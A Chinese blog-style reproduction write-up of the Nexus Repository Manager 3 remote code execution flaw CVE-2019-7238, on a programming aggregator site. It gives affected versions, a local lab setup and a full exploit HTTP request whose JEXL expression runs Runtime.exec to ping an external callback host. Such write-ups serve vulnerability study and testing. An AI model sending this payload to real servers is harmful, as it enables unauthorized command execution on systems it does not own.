我的编程空间,编程开发者的网络收藏夹
学习永远不晚

Nexus Repository Man

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

Nexus Repository Man

0x00 参考链接

https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019

0x01 影响版本

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

0x02 复现环境搭建

操作系统: windows 10
nexus版本:Nexus Repository Manager 3.14.0-04
下载链接:
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
nexus运行需要安装jdk环境,而且jdk需要去oracle下载,openjdk不可以
Nexus Repository Manager 3 RCE  CVE-2019-7238
下载完成后,解压nexus,在nexus-3.14.0-04\bin,执行
nexus.exe /run
直接访问localhost:8081 帐号密码 admin/admin123

0x03漏洞复现

首先需要上传一个资源,而真实环境则不需要,因为真实环境已经上传了assert
Nexus Repository Manager 3 RCE  CVE-2019-7238
然后访问content selectors
Nexus Repository Manager 3 RCE  CVE-2019-7238
抓包修改:

POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}

需要修改的点: {"property":"type","value":"jexl"}
"value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"
Nexus Repository Manager 3 RCE  CVE-2019-7238

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

Nexus Repository Man

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

Nexus Repository Man

0x00 参考链接https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Ac
2023-01-31

Nexus Repository Manager 2.x 命令注入漏洞 (CVE-2019-5475) 两次绕过

作者: Badcode and Longofo@知道创宇404实验室 时间: 2020年2月9日原文链接:https://paper.seebug.org/1260/ 英文链接:https://paper.seebug.org/1261/前
2023-06-04

nexus怎么安装

小编给大家分享一下nexus怎么安装,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!一、下载 官网下载地址:https://skyrim.nexusmods.com
2023-06-15

●VCL 中文man page(3)

EXAMPLES(例子)                  下面这段代码和默认的配置相同,后端服务器主机名设置为“backend.exampl.com”                   backend default {        
2023-01-31

Docker 搭建nexus私服

有三种专门的Maven仓库管理软件可以用来帮助大家建立私服:Apache基金会的Archiva、JFrog的Artifactory和Sonatype的Nexus。而Nexus是当前最流行的Maven仓库管理工具。 私服是一种特殊的远程仓库,
2023-01-31

Linux中MAN命令怎么用

这篇文章主要为大家展示了“Linux中MAN命令怎么用”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Linux中MAN命令怎么用”这篇文章吧。Linux man中的man就是manual的缩写,
2023-06-16

linux如何实现man page

这篇文章将为大家详细讲解有关linux如何实现man page,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。===一个典型的man page=== man date DATE(1) User Comman
2023-06-13

Linux man命令的具体使用

01. 命令概述 linux提供了丰富的帮助手册,当你需要查看某个命令的参数时不必到处上网查找,只要man一下即可。 同时也可以使用man man 查看man的使用方法。 02. 命令格式 man [-adfhktwW] [section]
2022-06-04

Linux常用命令man怎么用

这篇文章主要为大家展示了“Linux常用命令man怎么用”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Linux常用命令man怎么用”这篇文章吧。Linux常用命令man命令可以快速查询其他每个
2023-06-28

Linux中man命令如何使用

这期内容当中小编将会给大家带来有关Linux中man命令如何使用,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。man就是manual的缩写,用来查看系统中自带的各种参考手册,但是手册页分为好几个部分,如下
2023-06-16

Linux中Man命令有什么用

小编给大家分享一下Linux中Man命令有什么用,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!Linux上命令非常多,不同的命令选项实现不同的功能,在日常的使用的
2023-06-15

linux man命令有什么作用

这篇文章主要讲解了“linux man命令有什么作用”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“linux man命令有什么作用”吧!linux man命令是
2023-03-09

linux如何打造man中文

这篇文章主要介绍“linux如何打造man中文”,在日常操作中,相信很多人在linux如何打造man中文问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”linux如何打造man中文”的疑惑有所帮助!接下来,请跟
2023-06-12

Linux下man命令怎么用

这篇文章主要为大家展示了“Linux下man命令怎么用”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Linux下man命令怎么用”这篇文章吧。man就是manual的缩写,用来查看系统中自带的各
2023-06-17

ThinkPHP中如何使用 Repository包

这期内容当中小编将会给大家带来有关ThinkPHP中如何使用 Repository包,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。ThinkPHP>= thinkphp 6.0.*安装教程Composer
2023-06-20

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录